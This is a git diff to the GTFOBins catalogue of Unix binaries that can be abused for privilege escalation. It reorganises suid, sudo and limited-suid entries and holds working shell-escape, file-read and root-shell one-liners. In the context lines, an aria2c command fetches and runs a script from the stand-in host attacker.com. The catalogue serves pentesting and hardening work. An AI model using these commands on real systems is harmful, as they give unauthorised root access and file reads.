diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md index d9fc451..5793b81 100644 --- a/_gtfobins/aria2c.md +++ b/_gtfobins/aria2c.md @@ -10,13 +10,6 @@ functions: aria2c --on-download-error=$TF http://x - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa - suid: - - code: | - COMMAND='id' - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - ./aria2c --on-download-error=$TF http://x sudo: - code: | COMMAND='id' @@ -24,4 +17,11 @@ functions: echo "$COMMAND" > $TF chmod +x $TF sudo aria2c --on-download-error=$TF http://x + limited-suid: + - code: | + COMMAND='id' + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + ./aria2c --on-download-error=$TF http://x --- diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index a131e09..aed6432 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -27,6 +27,10 @@ functions: - code: | LFILE=file_to_read awk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./awk '//' "$LFILE" sudo: - code: sudo awk 'BEGIN {system("/bin/sh")}' limited-suid: diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 29735e9..b933fa2 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -17,6 +17,11 @@ functions: ed file_to_read ,p q + suid: + - code: | + ./ed file_to_read + ,p + q sudo: - code: | sudo ed diff --git a/_gtfobins/gawk.md b/_gtfobins/gawk.md index bf63ca8..dc398a6 100644 --- a/_gtfobins/gawk.md +++ b/_gtfobins/gawk.md @@ -27,6 +27,10 @@ functions: - code: | LFILE=file_to_read gawk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./gawk '//' "$LFILE" sudo: - code: sudo gawk 'BEGIN {system("/bin/sh")}' limited-suid: diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index cd50714..f66954f 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -7,7 +7,7 @@ functions: suid: - code: | ./hping3 - /bin/sh + /bin/sh -p sudo: - code: | sudo hping3 diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 6686bf5..0e634cc 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -59,6 +59,8 @@ functions: - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' file-read: - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' + suid: + - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' sudo: - code: sudo lua -e 'os.execute("/bin/sh")' limited-suid: diff --git a/_gtfobins/lwp-request.md b/_gtfobins/lwp-request.md index aaa7476..baf0a4b 100644 --- a/_gtfobins/lwp-request.md +++ b/_gtfobins/lwp-request.md @@ -4,12 +4,12 @@ functions: - code: | LFILE=file_to_read lwp-request "file://$LFILE" - suid: - - code: | - LFILE=file_to_read - ./lwp-request "file://$LFILE" sudo: - code: | LFILE=file_to_read sudo lwp-request "file://$LFILE" + limited-suid: + - code: | + LFILE=file_to_read + ./lwp-request "file://$LFILE" --- diff --git a/_gtfobins/mawk.md b/_gtfobins/mawk.md index fcaf868..0ff4b49 100644 --- a/_gtfobins/mawk.md +++ b/_gtfobins/mawk.md @@ -10,6 +10,10 @@ functions: - code: | LFILE=file_to_read mawk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./mawk '//' "$LFILE" sudo: - code: sudo mawk 'BEGIN {system("/bin/sh")}' limited-suid: diff --git a/_gtfobins/nawk.md b/_gtfobins/nawk.md index 9dc77fa..8663a76 100644 --- a/_gtfobins/nawk.md +++ b/_gtfobins/nawk.md @@ -27,6 +27,10 @@ functions: - code: | LFILE=file_to_read nawk '//' "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./nawk '//' "$LFILE" sudo: - code: sudo nawk 'BEGIN {system("/bin/sh")}' limited-suid: diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index ba93dde..6a76161 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -85,7 +85,7 @@ functions: file-write: - code: | TF=$(mktemp) - echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF + echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF nmap --script=$TF - description: The payload appears inside the regular nmap output. code: | @@ -94,7 +94,7 @@ functions: file-read: - code: | TF=$(mktemp) - echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF + echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF nmap --script=$TF sudo: - description: Input echo is disabled. diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md index 6c75a80..cc1a8cb 100644 --- a/_gtfobins/nohup.md +++ b/_gtfobins/nohup.md @@ -7,8 +7,8 @@ functions: COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out + suid: + - code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" sudo: - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" - suid: - - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" --- diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index 12daa5b..95b0719 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -14,6 +14,14 @@ functions: .import $LFILE t SELECT * FROM t; EOF + suid: + - code: | + LFILE=file_to_read + sqlite3 << EOF + CREATE TABLE t(line TEXT); + .import $LFILE t + SELECT * FROM t; + EOF sudo: - code: sudo sqlite3 /dev/null '.shell /bin/sh' limited-suid: